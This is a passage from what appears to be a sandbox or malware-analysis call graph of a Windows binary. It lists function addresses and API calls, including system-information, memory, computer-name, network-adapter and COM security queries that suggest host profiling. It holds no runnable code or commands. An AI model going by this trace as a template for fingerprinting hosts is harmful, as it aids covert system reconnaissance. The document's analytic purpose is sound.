45593 7ed93190 49 API calls 45592->45593 45594 7edea814 45593->45594 45595 7eda5eb0 49 API calls 45594->45595 45596 7edea878 45595->45596 45597 7ed93130 49 API calls 45596->45597 45598 7edea8ab 45597->45598 45599 7ed995e0 28 API calls 45598->45599 45600 7edea8e4 45599->45600 45601 7ed93b20 49 API calls 45600->45601 45602 7edea91e 45601->45602 45603 7eda5eb0 49 API calls 45602->45603 45604 7edea982 45603->45604 45605 7ed93130 49 API calls 45604->45605 45606 7edea9b5 45605->45606 45607 7ed93190 49 API calls 45606->45607 45608 7edea9ed 45607->45608 45609 7eda5eb0 49 API calls 45608->45609 45610 7edeaa51 45609->45610 45611 7ed93130 49 API calls 45610->45611 45612 7edeaa84 45611->45612 46416 7ed931f0 45612->46416 45615 7eda5eb0 49 API calls 45616 7edeab20 45615->45616 45617 7eda5eb0 49 API calls 45616->45617 45618 7edeab6c 45617->45618 45619 7edc5c10 std::ios_base::clear 26 API calls 45618->45619 45620 7edeabdf 45619->45620 45621 7edc5c10 std::ios_base::clear 26 API calls 45620->45621 45622 7edeac20 45621->45622 46421 7eda5ca0 45622->46421 45629 7edc5c10 std::ios_base::clear 26 API calls 45630 7edead79 45629->45630 45631 7edc5c10 std::ios_base::clear 26 API calls 45630->45631 45632 7edead85 45631->45632 45633 7edc5c10 std::ios_base::clear 26 API calls 45632->45633 45634 7edb9a67 45633->45634 45634->45410 46611 7edb2cf0 45635->46611 45637 7eddc533 46615 7edc71c0 45637->46615 45644 7eddc6f8 45646 7edc5c10 std::ios_base::clear 26 API calls 45644->45646 45645 7eddc5d0 46928 7edee380 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45645->46928 45648 7eddc707 45646->45648 45649 7edc5c10 std::ios_base::clear 26 API calls 45648->45649 45650 7eddc712 45649->45650 45651 7edc5c10 std::ios_base::clear 26 API calls 45650->45651 45654 7eddc721 45651->45654 45652 7eddc5e8 45653 7eddc6f3 45652->45653 45655 7eda6300 std::ios_base::clear 28 API calls 45652->45655 45653->45418 45656 7edc5c10 std::ios_base::clear 26 API calls 45654->45656 45657 7eddc610 45655->45657 45658 7eddc72c 45656->45658 46929 7edaac20 49 API calls 4 library calls 45657->46929 46641 7ed945a0 45658->46641 45660 7eddc622 46930 7ed9d1c0 45660->46930 45664 7eddc74d 45667 7eddc75d 45664->45667 45668 7eddc872 45664->45668 45666 7eddc66a std::ios_base::clear 45671 7eddad50 4 API calls 45666->45671 45669 7eda6300 std::ios_base::clear 28 API calls 45667->45669 46666 7edd8850 45668->46666 45672 7eddc771 45669->45672 45674 7eddc69d 45671->45674 45675 7ed945a0 49 API calls 45672->45675 45673 7eddc889 std::ios_base::clear 46681 7eddad50 GetPEB 45673->46681 45676 7ed93130 49 API calls 45674->45676 45677 7eddc79e 45675->45677 45678 7eddc6bd 45676->45678 46959 7edaa5d0 49 API calls 4 library calls 45677->46959 46949 7edaac20 49 API calls 4 library calls 45678->46949 45682 7eddc7a5 45684 7ed9d1c0 28 API calls 45682->45684 45683 7eddc6cf 46950 7eda9cc0 45683->46950 45686 7eddc7bd 45684->45686 45688 7edca810 28 API calls 45686->45688 45691 7eddc7dc std::ios_base::clear 45688->45691 45689 7eddc8bc 45689->45689 45692 7ed95330 numpunct 28 API calls 45689->45692 45690 7edc5c10 std::ios_base::clear 26 API calls 45690->45653 45694 7eddad50 4 API calls 45691->45694 45693 7eddc937 45692->45693 45695 7edc5c10 std::ios_base::clear 26 API calls 45693->45695 45696 7eddc80f 45694->45696 45697 7eddc946 45695->45697 45698 7ed93130 49 API calls 45696->45698 46685 7ed948a0 45697->46685 45700 7eddc82f 45698->45700 45702 7ed945a0 49 API calls 45700->45702 45704 7eddc84c 45702->45704 46960 7edaa5d0 49 API calls 4 library calls 45704->46960 45705 7eddc97b 45707 7edc5c10 std::ios_base::clear 26 API calls 45705->45707 45709 7eddc986 45707->45709 45708 7eddc853 45710 7eda9cc0 49 API calls 45708->45710 45711 7eda6300 std::ios_base::clear 28 API calls 45709->45711 45712 7eddc85e 45710->45712 45713 7eddc99d 45711->45713 45714 7edc5c10 std::ios_base::clear 26 API calls 45712->45714 45715 7eda6300 std::ios_base::clear 28 API calls 45713->45715 45716 7eddc86d 45714->45716 45717 7eddc9bb 45715->45717 45716->45418 45718 7eda6300 std::ios_base::clear 28 API calls 45717->45718 45719 7eddc9d9 45718->45719 46695 7edf1d60 45719->46695 45860 7ee01a6b _memcpy_s 45859->45860 45860->45422 45862 7ed95347 numpunct 45861->45862 45865 7ed95351 numpunct 45862->45865 45920 7edc5f10 28 API calls numpunct 45862->45920 45864 7ed9536a ctype 45864->45426 45865->45864 45921 7ed949c0 28 API calls 2 library calls 45865->45921 45922 7ed95950 45867->45922 45871 7edae4a5 45870->45871 45873 7edae420 swprintf 45870->45873 45871->45430 45987 7ee02f6c 29 API calls 45873->45987 45875 7eda7dfb 45874->45875 45988 7edab720 45875->45988 45877 7eda7e58 45992 7edad130 45877->45992 45879 7eda7e79 45880 7ed95330 numpunct 28 API calls 45879->45880 45881 7eda7ef6 45880->45881 45881->45881 45882 7ed95330 numpunct 28 API calls 45881->45882 45883 7eda7f6f 45882->45883 45884 7ed95330 numpunct 28 API calls 45883->45884 45885 7eda800f 45884->45885 45886 7eda7660 28 API calls 45885->45886 45887 7eda8047 45886->45887 45996 7eda9de0 45887->45996 45890 7eda9de0 28 API calls 45891 7eda807e 45890->45891 45892 7eda9de0 28 API calls 45891->45892 45893 7eda808d 45892->45893 45894 7eda9de0 28 API calls 45893->45894 45899 7eda809c Concurrency::cancellation_token_source::~cancellation_token_source 45894->45899 45895 7eda819c 45897 7edc5c10 std::ios_base::clear 26 API calls 45895->45897 45896 7eda6300 std::ios_base::clear 28 API calls 45896->45899 45898 7eda81a8 45897->45898 45900 7edc5c10 std::ios_base::clear 26 API calls 45898->45900 45899->45895 45899->45896 45904 7edc5c10 std::ios_base::clear 26 API calls 45899->45904 46000 7ed95fe0 45899->46000 45902 7eda81b4 45900->45902 45903 7edc5c10 std::ios_base::clear 26 API calls 45902->45903 45905 7eda81c0 45903->45905 45904->45899 45906 7edc5c10 std::ios_base::clear 26 API calls 45905->45906 45907 7eda81cc 45906->45907 45908 7edc5850 26 API calls 45907->45908 45909 7eda81db 45908->45909 45910 7edc5850 45909->45910 45911 7edc589e 45910->45911 45912 7edc58c4 45911->45912 46027 7ed990a0 26 API calls 3 library calls 45911->46027 45914 7edc58fa std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 45912->45914 46028 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45912->46028 45914->45454 45917 7edc5c3d 45916->45917 45919 7edc5ca4 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 45917->45919 46029 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45917->46029 45919->45456 45920->45865 45921->45864 45929 7ed94ab0 45922->45929 45930 7ed94ad6 45929->45930 45931 7ed94adb 45929->45931 45940 7ed94ef0 45930->45940 45938 7ed94b47 45931->45938 45949 7edc6910 45931->45949 45932 7ed94c65 45958 7eda8b90 45932->45958 45935 7edc6910 28 API calls 45935->45938 45937 7eda6300 std::ios_base::clear 28 API calls 45937->45938 45938->45932 45938->45935 45939 7eda6300 std::ios_base::clear 28 API calls 45938->45939 45939->45938 45941 7edc6910 28 API calls 45940->45941 45942 7ed94f3e 45941->45942 45943 7eda8b90 26 API calls 45942->45943 45944 7ed950de 45943->45944 45945 7eda8dc0 45944->45945 45946 7eda8dd7 45945->45946 45947 7ed959d6 45945->45947 45946->45947 45986 7ed990a0 26 API calls 3 library calls 45946->45986 45947->45428 45950 7edc692d 45949->45950 45951 7edc6932 45949->45951 45962 7edc5590 RaiseException Concurrency::cancel_current_task 45950->45962 45953 7edc6944 45951->45953 45956 7edc6955 45951->45956 45963 7ed94a40 28 API calls 3 library calls 45953->45963 45955 7ed94b15 45955->45937 45956->45955 45964 7ee02c1b 45956->45964 45959 7eda8bb7 45958->45959 45961 7eda8bf6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 45958->45961 45959->45961 45985 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45959->45985 45961->45930 45962->45951 45963->45955 45966 7ee02c20 45964->45966 45967 7ee02c3a 45966->45967 45969 7ee02c3c Concurrency::cancel_current_task 45966->45969 45972 7ee11916 45966->45972 45981 7ee12806 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 45966->45981 45967->45955 45982 7ee03f35 RaiseException 45969->45982 45971 7ee03871 45973 7ee17219 45972->45973 45974 7ee17257 45973->45974 45976 7ee17242 HeapAlloc 45973->45976 45979 7ee1722b _memcpy_s 45973->45979 45984 7ee07b4e 14 API calls _memcpy_s 45974->45984 45977 7ee17255 45976->45977 45976->45979 45978 7ee1725c 45977->45978 45978->45966 45979->45974 45979->45976 45983 7ee12806 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 45979->45983 45981->45966 45982->45971 45983->45979 45984->45978 45985->45961 45986->45946 45987->45871 45989 7edab768 swprintf 45988->45989 45991 7edab7ed 45988->45991 46008 7ee02f6c 29 API calls 45989->46008 45991->45877 45993 7edad209 45992->45993 45995 7edad184 swprintf 45992->45995 45993->45879 46009 7ee02f6c 29 API calls 45995->46009 45997 7eda8072 45996->45997 45998 7eda9dfc 45996->45998 45997->45890 46010 7edc6db0 45998->46010 46001 7ed9601a 46000->46001 46002 7ed96050 46001->46002 46026 7ee01fe8 28 API calls 2 library calls 46001->46026 46015 7ed936e0 46002->46015 46005 7ed9607e 46020 7eda8d60 46005->46020 46008->45991 46009->45993 46011 7edc6dc4 std::ios_base::clear 46010->46011 46012 7edc6e00 46010->46012 46011->45997 46014 7ed99950 28 API calls 4 library calls 46012->46014 46014->46011 46016 7edc6910 28 API calls 46015->46016 46017 7ed9372d 46016->46017 46018 7eda6300 std::ios_base::clear 28 API calls 46017->46018 46019 7ed9376b 46018->46019 46019->46005 46021 7eda8d94 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46020->46021 46022 7eda8d72 46020->46022 46024 7eda8b90 26 API calls 46021->46024 46023 7edc5c10 std::ios_base::clear 26 API calls 46022->46023 46023->46021 46025 7ed960a2 46024->46025 46025->45899 46027->45911 46028->45914 46029->45919 46037 7ed94c90 46030->46037 46033 7ed94ef0 28 API calls 46034 7ed95a67 46033->46034 46035 7eda8dc0 26 API calls 46034->46035 46036 7ed95a76 46035->46036 46036->45468 46039 7ed94cb9 46037->46039 46038 7ed94cd7 46038->46033 46039->46038 46040 7edc6910 28 API calls 46039->46040 46042 7ed94d54 46039->46042 46041 7ed94d16 46040->46041 46043 7eda6300 std::ios_base::clear 28 API calls 46041->46043 46044 7ed94eca 46042->46044 46045 7edc6910 28 API calls 46042->46045 46047 7eda6300 std::ios_base::clear 28 API calls 46042->46047 46043->46042 46046 7eda8b90 26 API calls 46044->46046 46045->46042 46046->46038 46047->46042 46049 7edc6910 28 API calls 46048->46049 46050 7eda856e 46049->46050 46050->45472 46239 7edb1580 46051->46239 46053 7edebd93 46054 7edebdc2 GetPEB 46053->46054 46055 7edebe01 46054->46055 46243 7eda1e70 46055->46243 46058 7edebf8e 46061 7edc6db0 28 API calls 46058->46061 46059 7edebff3 46060 7edc6db0 28 API calls 46059->46060 46062 7eda858a 46060->46062 46061->46062 46063 7ede7460 GetPEB 46062->46063 46064 7ede74af 46063->46064 46065 7ede7679 46064->46065 46066 7ede7620 46064->46066 46068 7edc6db0 28 API calls 46065->46068 46067 7edc6db0 28 API calls 46066->46067 46069 7eda8592 46067->46069 46068->46069 46070 7edeadb0 GetPEB 46069->46070 46071 7edeaf16 46070->46071 46072 7edeb14e GetPEB 46071->46072 46073 7edeb36d GetPEB 46071->46073 46075 7edeb184 46072->46075 46074 7edeb3db 46073->46074 46074->46075 46076 7edeb5f4 GetPEB 46074->46076 46077 7edeb804 GetPEB 46075->46077 46082 7edeb843 46075->46082 46076->46075 46077->46082 46078 7edeba3f 46249 7edad9a0 46078->46249 46081 7edeba4c 46081->46081 46083 7edc6db0 28 API calls 46081->46083 46082->46078 46253 7ee03f35 RaiseException 46082->46253 46084 7edebad3 46083->46084 46085 7eda859a 46084->46085 46254 7edae840 29 API calls swprintf 46084->46254 46089 7ede9b40 46085->46089 46087 7edebaed 46087->46087 46088 7edc6db0 28 API calls 46087->46088 46088->46085 46256 7eda1fc0 46089->46256 46093 7ede9ba2 46094 7ede9d78 46093->46094 46095 7ede9d19 46093->46095 46260 7ee00e20 31 API calls _fwprintf_s 46094->46260 46098 7edc6db0 28 API calls 46095->46098 46097 7ede9d89 46100 7edc6db0 28 API calls 46097->46100 46099 7eda85a2 46098->46099 46101 7ede76f0 46099->46101 46100->46099 46262 7eded200 46101->46262 46104 7ede7712 46105 7edc6db0 28 API calls 46104->46105 46117 7eda85aa 46105->46117 46106 7ede777f 46107 7ede7afb 46106->46107 46110 7ede791b 46106->46110 46108 7ede7b39 46107->46108 46109 7ede7ba1 46107->46109 46114 7ede7b9c 46107->46114 46112 7edc6db0 28 API calls 46108->46112 46282 7eda1cc0 46109->46282 46286 7eda1ea0 GetPEB 46110->46286 46112->46114 46300 7eda1ea0 GetPEB 46114->46300 46116 7ede7a8e 46116->46116 46119 7edc6db0 28 API calls 46116->46119 46133 7ede7f30 46117->46133 46119->46117 46121 7ede7cc3 46288 7edc5f40 46121->46288 46125 7ede7cf7 46297 7ee00e20 31 API calls _fwprintf_s 46125->46297 46127 7ede7d0a 46128 7edc6db0 28 API calls 46127->46128 46129 7ede7d6e 46128->46129 46298 7edc6540 GetPEB GetPEB 46129->46298 46131 7ede7d77 46299 7eda1f30 GetPEB 46131->46299 46326 7edaede0 46133->46326 46135 7ede7f53 46136 7ede7f82 GetPEB 46135->46136 46137 7ede7fce 46136->46137 46138 7ede8200 46137->46138 46141 7edc6db0 28 API calls 46137->46141 46330 7edabed0 46138->46330 46140 7ede820d 46142 7ede821e GetPEB 46140->46142 46141->46138 46143 7ede8275 46142->46143 46144 7ede8479 46143->46144 46145 7ede8445 GetPEB 46143->46145 46334 7edb0c30 46144->46334 46145->46144 46147 7ede864b 46148 7edc6db0 28 API calls 46147->46148 46149 7ede86d2 46148->46149 46150 7eda85b2 46149->46150 46338 7edab480 29 API calls swprintf 46149->46338 46154 7ede8780 GetPEB 46150->46154 46152 7ede86ec 46152->46152 46153 7edc6db0 28 API calls 46152->46153 46153->46150 46156 7ede87bd GetSystemInfo 46154->46156 46156->45487 46342 7edae910 46157->46342 46159 7ede8953 46160 7ede8982 GetPEB 46159->46160 46161 7ede89c1 46160->46161 46162 7eda1e70 GetPEB 46161->46162 46163 7ede8b44 46162->46163 46164 7ede8b4e 46163->46164 46165 7ede8bb6 46163->46165 46166 7edc6db0 28 API calls 46164->46166 46167 7edc6db0 28 API calls 46165->46167 46168 7eda85c2 46166->46168 46167->46168 46169 7edebb90 GetPEB 46168->46169 46170 7edebbd7 GlobalMemoryStatusEx 46169->46170 46172 7edebd4e __aulldiv 46170->46172 46172->45491 46178 7edec0c0 GetComputerNameExA 46173->46178 46175 7edec23a 46179 7edc6db0 28 API calls 46175->46179 46176 7edec2a5 46177 7eda1e70 GetPEB 46176->46177 46181 7edec2b5 46177->46181 46178->46175 46178->46176 46180 7eda85d2 46179->46180 46186 7ede8c30 46180->46186 46182 7edec2bf 46181->46182 46183 7edec327 46181->46183 46185 7edc6db0 28 API calls 46182->46185 46184 7edc6db0 28 API calls 46183->46184 46184->46180 46185->46180 46347 7ee03130 46186->46347 46190 7ede922e 46350 7edb34e0 29 API calls swprintf 46190->46350 46191 7ede8ea0 46349 7edb2270 29 API calls swprintf 46191->46349 46194 7ede8ead 46198 7ede8ebe GetPEB 46194->46198 46195 7ede9245 46197 7ede9256 GetPEB 46195->46197 46196 7ede8cb1 GetAdaptersInfo 46196->46190 46196->46191 46199 7ede92bd 46197->46199 46201 7ede8fa7 46198->46201 46351 7edb0fd0 29 API calls swprintf 46199->46351 46201->46201 46203 7edc6db0 28 API calls 46201->46203 46202 7ede94b9 46204 7ede94ca GetPEB 46202->46204 46205 7eda85da 46203->46205 46206 7ede9530 46204->46206 46232 7ede9e00 46205->46232 46352 7edafcb0 29 API calls swprintf 46206->46352 46208 7ede9753 46209 7ede9764 GetPEB 46208->46209 46210 7ede97cb 46209->46210 46353 7eda1de0 GetPEB 46210->46353 46212 7ede99c7 46354 7edae240 29 API calls swprintf 46212->46354 46214 7ede99d9 46355 7eda1c00 GetPEB 46214->46355 46216 7ede9a01 46356 7eda1c00 GetPEB 46216->46356 46218 7ede9a1d 46357 7edb1990 29 API calls swprintf 46218->46357 46220 7ede9a2f 46358 7eda1c00 GetPEB 46220->46358 46222 7ede9a57 46359 7eda1c00 GetPEB 46222->46359 46224 7ede9a73 46360 7edab3b0 29 API calls swprintf 46224->46360 46226 7ede9a85 46361 7eda1c00 GetPEB 46226->46361 46228 7ede9aad 46362 7ee00e20 31 API calls _fwprintf_s 46228->46362 46230 7ede9ac3 46231 7edc6db0 28 API calls 46230->46231 46231->46205 46363 7eda6730 46232->46363 46235 7ed95fe0 28 API calls 46236 7ede9e4f 46235->46236 46237 7edc5c10 std::ios_base::clear 26 API calls 46236->46237 46238 7eda85e2 46237->46238 46238->45498 46240 7edb1651 46239->46240 46241 7edb15cc swprintf 46239->46241 46240->46053 46247 7ee02f6c 29 API calls 46241->46247 46244 7eda1e7c 46243->46244 46246 7eda1e8e 46243->46246 46248 7edec740 GetPEB 46244->46248 46246->46058 46246->46059 46247->46240 46248->46246 46250 7edada59 46249->46250 46252 7edad9d4 swprintf 46249->46252 46250->46081 46255 7ee02f6c 29 API calls 46252->46255 46253->46078 46254->46087 46255->46250 46257 7eda1fcc 46256->46257 46258 7eda1fde GetPEB 46256->46258 46261 7edec740 GetPEB 46257->46261 46258->46093 46260->46097 46261->46258 46263 7eded21f 46262->46263 46301 7eda1cf0 46263->46301 46268 7eded4f0 46309 7eda1ed0 46268->46309 46271 7eded5a7 46317 7eda1ea0 GetPEB 46271->46317 46273 7eded702 46275 7eded9ac 46273->46275 46278 7eded86b 46273->46278 46274 7ede7703 46274->46104 46274->46106 46313 7eda1c60 46275->46313 46318 7eda1ea0 GetPEB 46278->46318 46280 7ededb24 46319 7eda1ea0 GetPEB 46280->46319 46283 7eda1ccc 46282->46283 46284 7eda1cde 46282->46284 46324 7edec740 GetPEB 46283->46324 46287 7eda1e10 GetPEB 46284->46287 46286->46116 46287->46121 46290 7edc5f5d 46288->46290 46289 7edc5fbc GetPEB 46291 7edc6033 GetPEB 46289->46291 46290->46289 46293 7edc6329 46291->46293 46325 7edebb80 GetPEB 46293->46325 46295 7edc64e5 46296 7eda1d50 GetPEB 46295->46296 46296->46125 46297->46127 46298->46131 46299->46114 46300->46117 46302 7eda1cfc 46301->46302 46303 7eda1d0e 46301->46303 46320 7edec740 GetPEB 46302->46320 46303->46274 46305 7eda1f00 46303->46305 46306 7eda1f0c 46305->46306 46308 7eda1f1e CoInitializeSecurity 46305->46308 46321 7edec740 GetPEB 46306->46321 46308->46268 46310 7eda1edc 46309->46310 46311 7eda1eee 46309->46311 46322 7edec740 GetPEB 46310->46322 46311->46271 46311->46273 46314 7eda1c6c 46313->46314 46315 7eda1c7e CoSetProxyBlanket 46313->46315 46323 7edec740 GetPEB 46314->46323 46315->46274 46315->46280 46317->46274 46318->46274 46319->46274 46320->46303 46321->46308 46322->46311 46323->46315 46324->46284 46325->46295 46327 7edaeea9 46326->46327 46329 7edaee24 swprintf 46326->46329 46327->46135 46339 7ee02f6c 29 API calls 46329->46339 46332 7edabfb1 46330->46332 46333 7edabf2c swprintf 46330->46333 46332->46140 46340 7ee02f6c 29 API calls 46333->46340 46335 7edb0cf1 46334->46335 46337 7edb0c6c swprintf 46334->46337 46335->46147 46341 7ee02f6c 29 API calls 46337->46341 46338->46152 46339->46327 46340->46332 46341->46335 46344 7edae9ed 46342->46344 46345 7edae968 swprintf 46342->46345 46344->46159 46346 7ee02f6c 29 API calls 46345->46346 46346->46344 46348 7ede8c3d GetPEB 46347->46348 46348->46196 46349->46194 46350->46195 46351->46202 46352->46208 46353->46212 46354->46214 46355->46216 46356->46218 46357->46220 46358->46222 46359->46224 46360->46226 46361->46228 46362->46230 46364 7eda679a 46363->46364 46364->46364 46365 7ed95330 numpunct 28 API calls 46364->46365 46366 7eda67d1 46365->46366 46366->46235 46367->45509 46369 7ed95477 numpunct 46368->46369 46371 7ed95481 std::ios_base::clear 46369->46371 46374 7edc5f10 28 API calls numpunct 46369->46374 46373 7ed9549a ctype 46371->46373 46375 7ed949c0 28 API calls 2 library calls 46371->46375 46373->45515 46374->46371 46375->46373 46470 7eda54d0 46376->46470 46379 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46380 7ed9317f 46379->46380 46380->45519 46383 7eda5f1c 46381->46383 46389 7eda5f40 46383->46389 46501 7edad590 28 API calls 46383->46501 46384 7eda5fc1 46385 7eda5fc9 46384->46385 46386 7eda6041 46384->46386 46504 7eda86c0 49 API calls 3 library calls 46385->46504 46506 7ed9bea0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46386->46506 46389->46384 46391 7eda6730 numpunct 28 API calls 46389->46391 46390 7eda6039 46392 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46390->46392 46393 7eda5f7c 46391->46393 46394 7eda607d 46392->46394 46502 7edca6c0 28 API calls 2 library calls 46393->46502 46394->45523 46397 7eda5fd9 46397->46390 46505 7edab0e0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46397->46505 46398 7eda5f9b 46503 7ee03f35 RaiseException 46398->46503 46400 7eda5faf 46401 7edc5c10 std::ios_base::clear 26 API calls 46400->46401 46401->46384 46507 7eda5500 46402->46507 46405 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46406 7ed931df 46405->46406 46406->45527 46408 7ed99605 46407->46408 46522 7ed93790 46408->46522 46411 7ed93b20 46526 7eda5440 46411->46526 46414 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46415 7ed93b6f 46414->46415 46415->45589 46539 7eda5540 46416->46539 46419 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46420 7ed9323f 46419->46420 46420->45615 46422 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46421->46422 46423 7eda5cdc 46422->46423 46424 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46423->46424 46425 7eda5d01 46424->46425 46426 7edc6d20 46425->46426 46427 7edc6d4c 46426->46427 46428 7edc6d2f 46426->46428 46431 7edc6d74 46427->46431 46596 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46427->46596 46428->46427 46595 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46428->46595 46433 7edc6d9c 46431->46433 46597 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46431->46597 46434 7edcc510 46433->46434 46435 7edcc545 std::exception::exception 46434->46435 46436 7edcc72d 46435->46436 46437 7edcc54f 46435->46437 46445 7edcc6ff Concurrency::cancellation_token_source::~cancellation_token_source 46436->46445 46600 7edf5600 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46436->46600 46598 7edf5600 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46437->46598 46440 7edccbbb 46442 7edccbc7 46440->46442 46443 7edccbe0 46440->46443 46441 7eda5ca0 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46441->46445 46446 7edccbd1 46442->46446 46447 7edccc72 46442->46447 46607 7eda8ef0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46443->46607 46444 7edcc586 Concurrency::cancellation_token_source::~cancellation_token_source 46599 7ed99800 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46444->46599 46445->46440 46445->46441 46464 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46445->46464 46466 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 46445->46466 46602 7edf1b30 49 API calls 2 library calls 46445->46602 46603 7ed99800 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46445->46603 46604 7edc9c90 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46445->46604 46605 7ed96b00 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46445->46605 46606 7edc9be0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46445->46606 46452 7edc5c10 std::ios_base::clear 26 API calls 46446->46452 46462 7edccbdb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46446->46462 46450 7edc5b10 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 46447->46450 46453 7edccc88 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46450->46453 46456 7edccd1a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46452->46456 46453->46462 46609 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46453->46609 46454 7edccbf6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46454->46462 46608 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46454->46608 46455 7edc5b10 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 46458 7edccd99 46455->46458 46456->46462 46610 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46456->46610 46458->45629 46461 7edcc778 Concurrency::cancellation_token_source::~cancellation_token_source 46461->46445 46601 7ed96b00 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46461->46601 46462->46455 46464->46445 46466->46445 46475 7ed9b7f0 46470->46475 46473 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46474 7ed93174 46473->46474 46474->46379 46484 7edc6750 46475->46484 46478 7eda6730 numpunct 28 API calls 46479 7ed9b876 46478->46479 46480 7ed9b89f 46479->46480 46497 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46479->46497 46493 7eda9560 46480->46493 46483 7ed9b8da 46483->46473 46485 7edc676f 46484->46485 46486 7edc676a 46484->46486 46488 7edc677f 46485->46488 46489 7edc6790 46485->46489 46498 7edc5590 RaiseException Concurrency::cancel_current_task 46486->46498 46499 7ed94a40 28 API calls 3 library calls 46488->46499 46491 7ed9b81c 46489->46491 46492 7ee02c1b std::_Facet_Register 16 API calls 46489->46492 46491->46478 46492->46491 46494 7eda9587 46493->46494 46495 7eda95cc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46493->46495 46494->46495 46500 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46494->46500 46495->46483 46497->46480 46498->46485 46499->46491 46500->46495 46501->46383 46502->46398 46503->46400 46504->46397 46505->46397 46506->46390 46512 7ed9b8f0 46507->46512 46510 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46511 7ed931d4 46510->46511 46511->46405 46513 7edc6750 28 API calls 46512->46513 46514 7ed9b91c 46513->46514 46515 7eda6300 std::ios_base::clear 28 API calls 46514->46515 46516 7ed9b974 46515->46516 46517 7ed9b99d 46516->46517 46521 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46516->46521 46519 7eda9560 26 API calls 46517->46519 46520 7ed9b9d8 46519->46520 46520->46510 46521->46517 46523 7ed937ff 46522->46523 46524 7ed93830 46522->46524 46523->46411 46525 7ed95330 numpunct 28 API calls 46524->46525 46525->46523 46531 7ed9b9f0 46526->46531 46529 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46530 7ed93b64 46529->46530 46530->46414 46532 7edc6750 28 API calls 46531->46532 46533 7ed9ba07 std::ios_base::clear 46532->46533 46534 7ed9ba81 46533->46534 46538 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46533->46538 46536 7eda9560 26 API calls 46534->46536 46537 7ed9bab5 46536->46537 46537->46529 46538->46534 46542 7ed9b680 46539->46542 46547 7ed9bfc0 46542->46547 46545 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46546 7ed93234 46545->46546 46546->46419 46556 7edc6830 46547->46556 46551 7ed9c085 46569 7eda96a0 46551->46569 46552 7ed9c05c 46552->46551 46573 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46552->46573 46555 7ed9b6cf 46555->46545 46557 7edc684f 46556->46557 46558 7edc684a 46556->46558 46560 7edc685f 46557->46560 46561 7edc6870 46557->46561 46574 7edc5590 RaiseException Concurrency::cancel_current_task 46558->46574 46575 7ed94a40 28 API calls 3 library calls 46560->46575 46563 7ee02c1b std::_Facet_Register 16 API calls 46561->46563 46564 7ed9bfec 46561->46564 46563->46564 46565 7ed93990 46564->46565 46566 7ed939f5 46565->46566 46576 7ed95890 46566->46576 46570 7eda96c7 46569->46570 46571 7eda970c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46569->46571 46570->46571 46594 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46570->46594 46571->46555 46573->46551 46574->46557 46575->46564 46577 7ed958cd 46576->46577 46578 7ed93a21 46576->46578 46584 7edc24a0 28 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46577->46584 46578->46552 46580 7ed958d9 46585 7ed9aca0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46580->46585 46582 7ed9590d 46582->46578 46586 7edc5b10 46582->46586 46584->46580 46585->46582 46587 7edc5b64 46586->46587 46590 7edc5bc0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46586->46590 46592 7ed95f80 49 API calls 2 library calls 46587->46592 46589 7edc5b79 